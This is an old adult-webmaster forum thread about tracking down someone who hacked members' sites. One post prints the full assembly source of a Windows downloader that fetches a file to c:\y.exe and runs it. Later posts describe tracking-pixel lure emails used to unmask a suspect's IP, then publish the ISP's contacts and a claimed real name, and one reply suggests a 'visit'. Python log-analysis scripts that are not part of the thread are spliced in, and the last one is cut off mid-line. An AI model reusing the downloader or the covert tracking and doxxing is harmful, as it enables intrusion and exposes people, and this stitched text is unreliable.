Old 08-18-2004, 05:10 AM   #51
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Master of misdirection this guy is:


good thing the internet has a memory
http://216.239.59.104/search?q=cache...b00gle.com/fa/
%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache...b00gle.com/fa/
tool.html+&hl=en


http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the
same files, as if copied in a for loop

i especially liked 2 files in the dir; counter.htm containing the
extremely funny
hahahahahahahaha language="hahahahahahahahahaha">
<!--
var lang = navigator.systemLanguage;
if (lang hahahaha "ru") document.location = "home.html";
//-->
</hahahahahahahaha


but then i saw this:
http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope
im not Violating someones copyright by posting this here,....

.386

.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

________szLibrary db "urlmon.dll",0
________szFunction db "URLDownloadToFileA",0

________szFileName db "c:\y.exe", 0

.code
start:

________invoke GetCommandLineA

________add ax, 0Ah
________lea ecx, [eax]
________push ecx

________invoke LoadLibrary, addr szLibrary
________invoke GetProcAddress, eax, addr szFunction

________pop ecx
________push 0
________push 0
________lea ebx, [szFileName]
________push ebx
________push ecx
________push 0
________call eax

________invoke WinExec, addr szFileName, 1
________invoke ExitProcess, NULL

end start


Yet i do feel a bit suspicious about this set of files;,... bit TOO
educating i think ;)
Old 08-18-2004, 05:23 AM   #52
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Wow!

http://www.webhelper4u.com/thewatcherlist.html

Jackpot. It could be ANY of those people.

IS YOUR NAME ON THAT LIST?

Lots of adult sites listed.
Old 08-18-2004, 05:44 AM   #53
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Ok, I know the issue now:

Your PHP is insecure. Update and secure your PHP on your web server.
Update apache as well. Make sure you are current.

Here is a list of the AdWare people and their IP's:
http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html

Notice if you copy the first three parts of an IP and search elsewhere
in the list you will find many domain on the same class C? Voila.

Happy hanging.
Old 08-18-2004, 06:03 AM   #54
JayJay
Confirmed User
 
Join Date: Jun 2002
Posts: 3,739
Don't forget your pipe, Sherlock
Old 08-18-2004, 11:19 AM   #55
Snake
Confirmed User
 
Industry Role:
Join Date: Mar 2001
Posts: 126
Bumping this. I hit one of the BangBros Tugjobs hosted galleries and was hit with an ActiveX for Trytoimprovesecurity.com also. It attempts to hijack the browser and install something, blocked it with Norton.
IP associated is 213.159.117.133
Old 08-18-2004, 02:36 PM   #56
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Amazing how many adult sites are engaging in bad adware:

http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html

I just got an ICQ from a stranger telling me that if I push any
further they will come kill me. They are hackers paid by adult
industry to hack sites and put that on them, fucked up shit.

Fuck them, I will keep pushing and find out who they are
and expose them for hacking into sites illegally. Put aside
the adware part, they are still breaking and entering.

I'm coming to get ya!
Old 08-18-2004, 02:44 PM   #57
QuaWee
Confirmed User
 
Join Date: Jul 2004
Location: boogers
Posts: 5,791
who's your hosting company?
__________________
i luv mainstream
Old 08-18-2004, 02:49 PM   #58
xlogger
Confirmed User
 
Join Date: Jul 2004
Location: NY
Posts: 9,507
Quote:
Originally posted by fris
well first off, if you would have secured your server before you put it online, then your data wouldn't have been insecure in the first place. i can guarantee you if i did a security audit on 100 machines on people on gfy, 85 would be insecure. no wonder all these sponsors are getting hacked. first thing you do when you buy a server is secure it. i never put any of my clients' servers online until everything is locked up tight.
Time to get hosting from you.
__________________

----------
XLOGGER [REFLECTED] [OH]
Old 08-18-2004, 03:03 PM   #59
skoalman
Registered User
 
Join Date: Jun 2004
Posts: 94
Quote:
Originally posted by fris
well first off, if you would have secured your server before you put it online, then your data wouldn't have been insecure in the first place. i can guarantee you if i did a security audit on 100 machines on people on gfy, 85 would be insecure. no wonder all these sponsors are getting hacked. first thing you do when you buy a server is secure it. i never put any of my clients' servers online until everything is locked up tight.

Out of 100, I'd say 95 would be hackable. And that's just with a basic security audit, if I did a full blown one all of them, I'd say at least 99 of them would be insecure in one way or another. I've been doing security work for the better part of 20 years and have yet to see a fully secure system.

If someone wants in, they will get in. Plain and simple. I've also yet to see a system that I haven't been able to penetrate during a full blown pen test. Most security people are that way and if they are not, they need to learn more.
Old 08-18-2004, 03:15 PM   #60
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
I am happy though that a lot of webmasters/site owners are taking security
into consideration now. They used to laugh back in the days when we told
them it was a hacker..... it had the same effect as if we told them a yellow
zebra was standing behind them.

I have been in security since 1992 and just love the thrill of securing a box and
hunting down hackers.

:-)

I smell their blood.

lol
Old 08-18-2004, 03:17 PM   #61
skillfull
Confirmed User
 
 
Industry Role:
Join Date: Apr 2003
Location: Quebec Calisse
Posts: 4,716
Quote:
Originally posted by skoalman
Out of 100, I'd say 95 would be hackable. And that's just with a basic security audit, if I did a full blown one all of them, I'd say at least 99 of them would be insecure in one way or another. I've been doing security work for the better part of 20 years and have yet to see a fully secure system.

If someone wants in, they will get in. Plain and simple. I've also yet to see a system that I haven't been able to penetrate during a full blown pen test. Most security people are that way and if they are not, they need to learn more.
ive done a lots of security industry works too, a server can be secure but will become useless with all the security
but there is way to put a server very very secure even against unknown exploit
i can sure make a server 99.9% of the hackers cant hack
__________________
mind at underdark dot cc
SEO Analyst
Thunder-Ball.net - Member
Old 08-18-2004, 03:20 PM   #62
skoalman
Registered User
 
Join Date: Jun 2004
Posts: 94
Quote:
Originally posted by skillfull
ive done a lots of security industry works too, a server can be secure but will become useless with all the security
but there is way to put a server very very secure even against unknown exploit
i can sure make a server 99.9% of the hackers cant hack

Yea disable every service known and pray that your kernel is secure and your router and firewall is updated. I've gotten around many "secure" servers because they didn't keep their routers and firewalls updated.
Old 08-19-2004, 01:18 AM   #63
PowerCum
CjOverkill
 
Industry Role:
Join Date: Apr 2003
Location: Woldwide
Posts: 1,328
Quote:
Originally posted by skoalman
Yea disable every service known and pray that your kernel is secure and your router and firewall is updated. I've gotten around many "secure" servers because they didn't keep their routers and firewalls updated.
Enable PaX with memory page segmentation and randomization, role based access control and some strong acl system (kernel and fs based) and then watch how funny is when someone becomes root on the server and then can do nothing
And don't forget to compile all your distro by hand and strip all the binaries.
Also if you want more security put all the services in chroot (best option is one service per server)... and don't just copy all the system into the chroot, only the needed libraries... apache does not need a bash shell in order to run into its sandbox.
Of course, this will do nothing if you open every possible service around and set your root password to something easy to guess. So configure your firewall properly blocking all inbound SYN packets except for the ports where you will offer some service and all outbound packets (any traffic) except for the ports your services will use. You will get some headaches configuring FTP services using these firewall rules... but it's not very big problem.

This concept has been tested for over 5 years with IronBox Linux on an open for hacking shell access server (they were able to start a shell session on the box) and no one has been able to escalate privileges.

It's not only the firewall, it's the entire system. Usually firewalls are the most useless part in security because they could be always bypassed using one method or another. It's not easy and takes some time to bypass a firewall, but it's still possible and not enough difficult to stop a not very novice hacker.
__________________
CjOverkill Traffic Trading Script
Free, secure and fast traffic trading script. Get your copy now
Old 08-19-2004, 11:04 AM   #64
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
I have caught your hacker!

Here is the lowdown.....

To find the hacker you must first find out who owns those domains.....
And the only way to see who owns those domains (because the info is fake)
is to find out WHO is receiving the emails for the domain's contact email account,
which for all those domains, is the same person.

This person uses a yahoo email address, and getting the info on who owns
an email account from yahoo would be very difficult, especially considering
they most likely filled in fake info there as well. So why not get their IP from yahoo you ask? Because yahoo won't help you without a subpoena.....
Even friends I have at yahoo can't help me because they do not allow access
to logs except to their legal dept. which is a pain to deal with as well.....

So, I ask myself, If this person is using a yahoo web based email account to check his mail, and we need his IP address to identify him, let's get the IP already!

I decided to email an artificial spam mail to him. The secret here is that
he is the ONLY one getting this spam mail. I used a rather catchy subject
that he COULD NOT RESIST:

"Hacker Caught?"

When he looked at the email, it was nothing special. I made it look like an
ad to an online casino. He would take a peek at it, then most likely just delete it
thinking to himself, "fucking spammer!", while his heart pumped heavily thinking
perhaps he had been caught.

What he DID NOT KNOW that happened behind the scenes is that in the spam
mail, the only image that was loaded in the email was an invisible 1x1 pixel.
All other items in the mail were HTML.

This 1x1 hidden pixel was loaded off of MY server using an image name that NO ONE would know. In fact, the image doesn't even exist and since I set the
height and width of the image to 1, he would not see a broken image in there
anyways..... this would simply generate a couple log entries on my server
letting me know HIS HOME COMPUTERS IP ADDRESS because in order to use
yahoo mail, you have to use a web browser, and he certainly did!!!

Because the image does not exist on my server, but his browser tried to load it,
his accessing his yahoo mail led to 2 entries in my server logs. One is the access_log entry, and the other, when the image could not be found, was the error_log entry.

The URL to the nonexistent image is: http://www.splitinfinity.com/themainman

access_log entry:
195.131.125.119 www.splitinfinity.com - [19/Aug/2004:01:01:46 -0700] "GET /themainman HTTP/1.1" 302 302 "http://us.f403.mail.yahoo.com/ym/ShowLetter?MsgId=1922_1014156_59656_1208_1013_0_846_4944_1839376362&Idx=0&YY=48958&inc=25&order=down&sort=date&pos=0&view=&head=&box=Inbox" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2"

error_log entry:
[Thu Aug 19 01:01:46 2004] [error] [client 195.131.125.119] File does not exist: /home/split/splitinfinity.com/public_html/themainman, referer: http://us.f403.mail.yahoo.com/ym/Sho...ead=&box=Inbox


******** His IP address is: 195.131.125.119 **********

This is most likely a dynamic IP, but, since we know the time and date of the
access, we can call the IP owner (his ISP as listed below) and perhaps get
that information. I will continue to send him some of these emails and
log all the ip ranges he comes from, which im sure at this point will all be
the same isp since it is a broadband connection on his end.

w00000h00000!

betcha he didn't see that coming.
Old 08-19-2004, 11:05 AM   #65
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 195.0.0.0 - 195.255.255.255
CIDR: 195.0.0.0/8
NetName: RIPE-CBLK3
NetHandle: NET-195-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS2.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH03.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 1996-03-25
Updated: 2004-03-16

TechHandle: RIPE-NCC-ARIN
TechName: RIPE NCC Hostmaster
TechPhone: +31 20 535 4444
TechEmail: [email protected]

# ARIN WHOIS database, last updated 2004-08-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Old 08-19-2004, 11:10 AM   #66
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Further more accurate whois data from RIPE:

The company who OWNS the IP itself is:
WEBPlus Ltd.
St.Petersburg, RU

Their email addresses:
[email protected]
[email protected]
[email protected]
[email protected]


Michael V. Vasiliev
ZAO WebPlus, 29 Kolomenskaya
191119, Saint-Petersburg
Russia
phone: +7 812 3269020
fax-no: +7 812 3269029
Old 08-19-2004, 11:14 AM   #67
prodiac
Confirmed User
 
Industry Role:
Join Date: Sep 2003
Location: amerinoc.com
Posts: 419
Great job, boss
Old 08-19-2004, 11:20 AM   #68
iwantchixx
Too lazy to set a custom title
 
 
Industry Role:
Join Date: Oct 2002
Location: The Boonies
Posts: 12,860
Quote:
Originally posted by fris
well first off, if you would have secured your server before you put it online, then your data wouldn't have been insecure in the first place. i can guarantee you if i did a security audit on 100 machines on people on gfy, 85 would be insecure. no wonder all these sponsors are getting hacked. first thing you do when you buy a server is secure it. i never put any of my clients' servers online until everything is locked up tight.

that's total assholish of you. Like it's his fault someone hacked his shit. it's as retarded as blaming Ford because someone slammed a semi into the car but buddie died cause he didn't have seatbelts on.

Point is, secure or not, these people find ways in.
Old 08-19-2004, 11:29 AM   #69
broke
Confirmed User
 
Join Date: Aug 2003
Location: Someplace Windy
Posts: 4,501
This thread was surely interesting...
Old 08-19-2004, 12:04 PM   #70
Stramm
Confirmed User
 
Join Date: Jan 2003
Location: NL
Posts: 342
well done SplitInfinity. Was very interesting to follow your progress even if most of the links are already dead
Old 08-19-2004, 12:17 PM   #71
cosis
Confirmed User
 
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,276
very impressive splitinfinity, now we need a team of webmasters to pay this guy a visit
Old 08-19-2004, 12:20 PM   #72
skillfull
Confirmed User
 
 
Industry Role:
Join Date: Apr 2003
Location: Quebec Calisse
Posts: 4,716
ah btw
http://www.gofuckyourself.com/showth...adid=343314&s=
__________________
mind at underdark dot cc
SEO Analyst
Thunder-Ball.net - Member
Old 08-19-2004, 04:34 PM   #73
GoNe
Confirmed User
 
 
Join Date: Jan 2003
Location: unknown
Posts: 2,892
Quote:
Originally posted by cosis
very impressive splitinfinity, now we need a team of webmasters to pay this guy a visit
__________________
buying domains 1 year or more in age. Adult related only. Email me at webmaster @ crazyvids.com
Old 08-19-2004, 05:19 PM   #74
http
Confirmed User
 
Join Date: Oct 2001
Posts: 1,811
Quote:
Originally posted by SplitInfinity
Further more accurate whois data from RIPE:

The company who OWNS the IP itself is:
WEBPlus Ltd.
St.Petersburg, RU

Their email addresses:
[email protected]
[email protected]
[email protected]
[email protected]


Michael V. Vasiliev
ZAO WebPlus, 29 Kolomenskaya
191119, Saint-Petersburg
Russia
phone: +7 812 3269020
fax-no: +7 812 3269029

The BW prices on your site, are they actual usage (as in 320 GB in+out combined is 1 mbps) or 95 percentile based? 95% I guess?
Old 08-19-2004, 05:48 PM   #75
xlogger
Confirmed User
 
Join Date: Jul 2004
Location: NY
Posts: 9,507
damn this thread rules!

__________________

----------
XLOGGER [REFLECTED] [OH]
Old 08-19-2004, 06:54 PM   #76
skoalman
Registered User
 
Join Date: Jun 2004
Posts: 94
Well done!

I see that at someone else on here has the skills. Tracking down hackers isn't as hard as people think it is. I did it many many times when I was the IT manager and head of security for a live feed company and also have done it for clients of mine.

I may have a use for you sometime as sometimes I get too busy for all my clients and taking on more work is not always the best things as I want my clients to be %150 happy with what I do and so I limit what I'll take so I don't stretch myself too thin.




Quote:
Originally posted by SplitInfinity
I have caught your hacker!

Here is the lowdown.....

To find the hacker you must first find out who owns those domains.....
And the only way to see who owns those domains (because the info is fake)
is to find out WHO is receiving the emails for the domain's contact email account,
which for all those domains, is the same person.

This person uses a yahoo email address, and getting the info on who owns
an email account from yahoo would be very difficult, especially considering
they most likely filled in fake info there as well. So why not get their IP from yahoo you ask? Because yahoo won't help you without a subpoena.....
Even friends I have at yahoo can't help me because they do not allow access
to logs except to their legal dept. which is a pain to deal with as well.....

So, I ask myself, If this person is using a yahoo web based email account to check his mail, and we need his IP address to identify him, let's get the IP already!

I decided to email an artificial spam mail to him. The secret here is that
he is the ONLY one getting this spam mail. I used a rather catchy subject
that he COULD NOT RESIST:

"Hacker Caught?"

When he looked at the email, it was nothing special. I made it look like an
ad to an online casino. He would take a peek at it, then most likely just delete it
thinking to himself, "fucking spammer!", while his heart pumped heavily thinking
perhaps he had been caught.

What he DID NOT KNOW that happened behind the scenes is that in the spam
mail, the only image that was loaded in the email was an invisible 1x1 pixel.
All other items in the mail were HTML.

This 1x1 hidden pixel was loaded off of MY server using an image name that NO ONE would know. In fact, the image doesn't even exist and since I set the
height and width of the image to 1, he would not see a broken image in there
anyways..... this would simply generate a couple log entries on my server
letting me know HIS HOME COMPUTERS IP ADDRESS because in order to use
yahoo mail, you have to use a web browser, and he certainly did!!!

Because the image does not exist on my server, but his browser tried to load it,
his accessing his yahoo mail led to 2 entries in my server logs. One is the access_log entry, and the other, when the image could not be found, was the error_log entry.

The URL to the nonexistent image is: http://www.splitinfinity.com/themainman

access_log entry:
195.131.125.119 www.splitinfinity.com - [19/Aug/2004:01:01:46 -0700] "GET /themainman HTTP/1.1" 302 302 "http://us.f403.mail.yahoo.com/ym/ShowLetter?MsgId=1922_1014156_59656_1208_1013_0_846_4944_1839376362&Idx=0&YY=48958&inc=25&order=down&sort=date&pos=0&view=&head=&box=Inbox" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2"

error_log entry:
[Thu Aug 19 01:01:46 2004] [error] [client 195.131.125.119] File does not exist: /home/split/splitinfinity.com/public_html/themainman, referer: http://us.f403.mail.yahoo.com/ym/Sho...ead=&box=Inbox


******** His IP address is: 195.131.125.119 **********
Old 08-19-2004, 07:01 PM   #77
sixxxthsense
Confirmed User
 
Join Date: Aug 2004
Location: Toronto
Posts: 2,421
splitinfinity is the fucking MAN!!!
Old 08-19-2004, 07:12 PM   #78
zdwebber
So Fucking Banned
 
Join Date: Feb 2004
Location: Hit me up @ 97400700 . If your looking for traffic trades, head over to HQBang.com. If your looking for a place to submit, head there as well. If you have a vaginal opening and are looking for insertion, please contact me asap. BANG!!!
Posts: 768
You really know your shit SplitInfinity, very impressive!
I'd trust you with my box
Old 08-19-2004, 10:11 PM   #79
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
The bandwidth pricing on SplitInfinity.com is average utilization based on MRTG graphs. Bring your sites over. :-)


Thanks for the compliments.
Anyone else need any help?

I really love doing this stuff....

By the way,

The guy's name is Miroslav Petrovic who hacked your site.
:-)

Go get em!
Old 08-19-2004, 10:12 PM   #80
fr8
Confirmed User
 
Industry Role:
Join Date: Mar 2003
Posts: 5,074
So how are things going. Have you owned his ass yet?
__________________
joesmut (a) gmail Dot com
Full Stack Developer
Old 08-19-2004, 10:15 PM   #81
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Hey, I just thought about something,
if you still have your web servers logs, I bet
your hackers IP is in the web logs.....

He will have been the VERY FIRST person to see the IFRAMES....
They always test their work just after they implemented the html
modifications...... They normally will be one of the very first hits
in your web logs just after the mods were done so that's a good
way to age the hack and know what time it occurred.....

Keep in mind the last octets of his ip may change because his ISP told me
they only have that one class C for their broadband customers...

:-)
Old 08-19-2004, 10:21 PM   #82
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Just emailed him again:

SUBJECT: Yahoo space utilization

he will click on it, say Fuck that spammer and delete it....
meanwhile I log him again.

I have logged him from the same class C 3 times now during the hours of 1am to 3 am PST so that is his hours of operation and that time fits daytime in his country's time zone. :-)

So we're creating a dossier on this guy.
:-)
Old 08-19-2004, 10:23 PM   #83
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Looks like some of you guys tried my honeypot link:

Notice the gfy referral links. :-0

62.42.228.6 www.splitinfinity.com - [19/Aug/2004:16:32:47 -0700] "GET /themainman HTTP/1.1" 302 302 "http://www.gofuckyourself.com/showthread.php?s=&threadid=342366&perpage=50&pagenumber=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
68.83.122.119 www.splitinfinity.com - [19/Aug/2004:17:35:57 -0700] "GET /themainman HTTP/1.1" 302 302 "http://www.gfyboard.com/showthread.php?s=&threadid=342366&perpage=50&pagenumber=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2"
164.107.220.226 www.splitinfinity.com - [19/Aug/2004:17:58:51 -0700] "GET /themainman HTTP/1.1" 302 302 "http://www.gofuckyourself.com/showthread.php?s=&threadid=342366&perpage=50&pagenumber=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
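The log triage described in posts #64 and #81 to #83 above, as an added Python example that is not part of the thread: it parses access_log lines in the layout quoted above, lists the first requests for a page after its modification time, and separates hits on a beacon URL whose referer is the webmail host from hits by readers who followed the link once it was published. The log lines, the `/beacon-a1` path, the `mail.example` and `forum.example` hosts and the modification time are constructed, and the addresses come from the documentation ranges.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone
from ipaddress import ip_network
from urllib.parse import urlsplit

# Field layout of the access_log lines quoted in the thread:
# client vhost - [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) (?P<vhost>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return one log entry as a dict, or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    try:
        e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["ref_host"] = (urlsplit(e["referer"]).hostname or "").lower()
        # "Class C" in the thread's sense: the /24 that contains the client.
        e["net24"] = str(ip_network(e["ip"] + "/24", strict=False))
    except ValueError:
        return None
    return e


def parse_log(lines):
    """Parse all lines, drop the unparseable ones, sort by request time."""
    entries = [e for e in map(parse_line, lines) if e]
    return sorted(entries, key=lambda e: e["time"])


def first_hits_after(entries, path, modified_at, limit=3):
    """Earliest requests for `path` at or after the file's modification time."""
    hits = [e for e in entries if e["path"] == path and e["time"] >= modified_at]
    return hits[:limit]


def triage_beacon(entries, beacon_path, webmail_domain):
    """Separate beacon hits that came from the webmail UI from everything else.

    The Referer header is client-supplied and the client address may be a
    proxy, so the result is a lead to corroborate, not an identification.
    """
    expected, other = [], []
    for e in entries:
        if e["path"] != beacon_path:
            continue
        host = e["ref_host"]
        from_webmail = host == webmail_domain or host.endswith("." + webmail_domain)
        (expected if from_webmail else other).append(e)
    return {
        "expected": expected,
        "other": other,  # e.g. readers who followed the URL once it was posted
        "networks": Counter(e["net24"] for e in expected),
        "hours": Counter(e["time"].hour for e in expected),
    }


# Constructed sample data (assumptions, not taken from the thread).
LOG_TZ = timezone(timedelta(hours=-7))
MODIFIED_AT = datetime(2004, 8, 18, 23, 40, 0, tzinfo=LOG_TZ)  # mtime of altered page
SAMPLE_LOG = [
    '203.0.113.9 www.example.test - [18/Aug/2004:22:10:00 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.77 www.example.test - [18/Aug/2004:23:41:12 -0700] "GET /index.html HTTP/1.1" 200 5480 "-" "Mozilla/5.0"',
    '192.0.2.14 www.example.test - [18/Aug/2004:23:55:00 -0700] "GET /index.html HTTP/1.1" 200 5480 "http://search.example/?q=x" "Mozilla/4.0"',
    '198.51.100.23 www.example.test - [19/Aug/2004:01:01:46 -0700] "GET /beacon-a1 HTTP/1.1" 302 302 "http://us.mail.example/ym/ShowLetter?MsgId=1" "Mozilla/5.0"',
    '203.0.113.50 www.example.test - [19/Aug/2004:16:32:47 -0700] "GET /beacon-a1 HTTP/1.1" 302 302 "http://forum.example/showthread.php?threadid=1" "Mozilla/4.0"',
    '192.0.2.200 www.example.test - [19/Aug/2004:17:35:57 -0700] "GET /beacon-a1 HTTP/1.1" 302 302 "-" "Mozilla/5.0"',
    '198.51.100.140 www.example.test - [20/Aug/2004:02:30:10 -0700] "GET /beacon-a1 HTTP/1.1" 302 302 "http://us.mail.example/ym/ShowLetter?MsgId=2" "Mozilla/5.0"',
    'truncated line with no fields',
]


def run_demo():
    """Run both checks over the constructed sample log."""
    entries = parse_log(SAMPLE_LOG)
    first = first_hits_after(entries, "/index.html", MODIFIED_AT)
    report = triage_beacon(entries, "/beacon-a1", "mail.example")
    return first, report


if __name__ == "__main__":
    first, report = run_demo()
    for e in first:
        print("after modification:", e["time"].isoformat(), e["ip"])
    print("webmail-referred networks:", dict(report["networks"]))
    print("webmail-referred hours:", dict(report["hours"]))
    print("other beacon hits:", [(e["ip"], e["ref_host"] or "-") for e in report["other"]])
```

The same grouping explains why mail clients that block remote images by default defeat this kind of beacon: no request is made, so no log entry exists to triage.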
Old 08-19-2004, 10:23 PM   #84
exposed
Confirmed User
 
Join Date: Aug 2004
Location: unknown
Posts: 1,449

Quote:
Originally posted by KC
If the box was compromised, then start over with a clean install on a new box. Don't think you can "plug" the hole and everything will be secure again.

Once it's been compromised it's damaged goods.
pfttt....not true
__________________
"I felt victimized by the Ian Eisenbergs of the world" - Mary Burger
Old 08-19-2004, 10:26 PM   #85
exposed
Confirmed User
 
Join Date: Aug 2004
Location: unknown
Posts: 1,449

Quote:
Originally posted by SplitInfinity
Amazing how many adult sites are engaging in bad adware:

http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html

I just got an ICQ from a stranger telling me that if I push any
further they will come kill me. They are hackers paid by adult
industry to hack sites and put that on them, fucked up shit.

Fuck them, I will keep pushing and find out who they are
and expose them for hacking into sites illegally. Put aside
the adware part, they are still breaking and entering.

I'm coming to get ya!

lmfao
__________________
"I felt victimized by the Ian Eisenbergs of the world" - Mary Burger
Old 08-19-2004, 10:31 PM   #86
exposed
Confirmed User
 
Join Date: Aug 2004
Location: unknown
Posts: 1,449

Quote:
Originally posted by SplitInfinity
I have caught your hacker!

Here is the lowdown.....

To find the hacker you must first find out who owns those domains.....
And the only way to see who owns those domains (because the info is fake)
is to find out WHO is receiving the emails for the domain's contact email account,
which for all those domains, is the same person.

This person uses a yahoo email address, and getting the info on who owns
an email account from yahoo would be very difficult, especially considering
they most likely filled in fake info there as well. So why not get their IP from yahoo you ask? Because yahoo won't help you without a subpoena.....
Even friends I have at yahoo can't help me because they do not allow access
to logs except to their legal dept. which is a pain to deal with as well.....

So, I ask myself, If this person is using a yahoo web based email account to check his mail, and we need his IP address to identify him, let's get the IP already!

I decided to email an artificial spam mail to him. The secret here is that
he is the ONLY one getting this spam mail. I used a rather catchy subject
that he COULD NOT RESIST:

"Hacker Caught?"

When he looked at the email, it was nothing special. I made it look like an
ad to an online casino. He would take a peek at it, then most likely just delete it
thinking to himself, "fucking spammer!", while his heart pumped heavily thinking
perhaps he had been caught.

What he DID NOT KNOW that happened behind the scenes is that in the spam
mail, the only image that was loaded in the email was an invisible 1x1 pixel.
All other items in the mail were HTML.

This 1x1 hidden pixel was loaded off of MY server using an image name that NO ONE would know. In fact, the image doesn't even exist and since I set the
height and width of the image to 1, he would not see a broken image in there
anyways..... this would simply generate a couple log entries on my server
letting me know HIS HOME COMPUTERS IP ADDRESS because in order to use
yahoo mail, you have to use a web browser, and he certainly did!!!

Because the image does not exist on my server, but his browser tried to load it,
his accessing his yahoo mail led to 2 entries in my server logs. One is the access_log entry, and the other, when the image could not be found, was the error_log entry.

The URL to the nonexistent image is: http://www.splitinfinity.com/themainman

access_log entry:
195.131.125.119 www.splitinfinity.com - [19/Aug/2004:01:01:46 -0700] "GET /themainman HTTP/1.1" 302 302 "http://us.f403.mail.yahoo.com/ym/ShowLetter?MsgId=1922_1014156_59656_1208_1013_0_84 6_4944_1839376362&Idx=0&YY=48958&inc=25&order=down &sort=date&pos=0&view=&head=&box=Inbox" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2"

error_log entry:
[Thu Aug 19 01:01:46 2004] [error] [client 195.131.125.119] File does not exist: /home/split/splitinfinity.com/public_html/themainman, referer: http://us.f403.mail.yahoo.com/ym/Sho...ead=&box=Inbox


******** His IP address is: 195.131.125.119 **********

This is most likely a dynamic IP, but, since we know the time and date of the
access, we can call the IP owner (his ISP as listed below) and perhaps get
that information. I will continue to send him some of these emails and
log all the ip ranges he comes from, which I'm sure at this point will all be
the same isp since it is a broadband connection on his end.

w00000h00000!

betcha he didn't see that coming.

hahaha nice!

owned.
__________________
"I felt victimized by the Ian Eisenbergs of the world" - Mary Burger
Old 08-20-2004, 11:17 AM   #87
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Hahahah,

Had to change my honeypot link in the emails I sent him because
I got 124 GFY'ers trying to load it up to see what it does.... lol!
That will interfere with my forensics. :-) So I changed it from here on out.

You guys don't wanna be mistaken for Joe hacker do you?

HEY, there could be a nice reality show, Joe Hacker.

:-)
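The problem described in the post above (curious forum readers loading the token URL and polluting the log) can be handled at analysis time by splitting hits on the token path by referer host. This is an added example, not code from the thread; the path /canary-1, the host names, the addresses and the sample log lines are all constructed, and the regular expression assumes the access_log layout quoted earlier in the thread.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Layout of the access_log lines quoted in the thread:
# client vhost ident [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'(?P<ip>\S+) (?P<vhost>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (documentation addresses and example hosts).
SAMPLE_LOG = """\
192.0.2.10 www.example.com - [19/Aug/2004:01:01:46 -0700] "GET /canary-1 HTTP/1.1" 302 302 "http://mail.example.net/ym/ShowLetter?MsgId=1&box=Inbox" "Mozilla/5.0 (Windows; U) Firefox/0.9.2"
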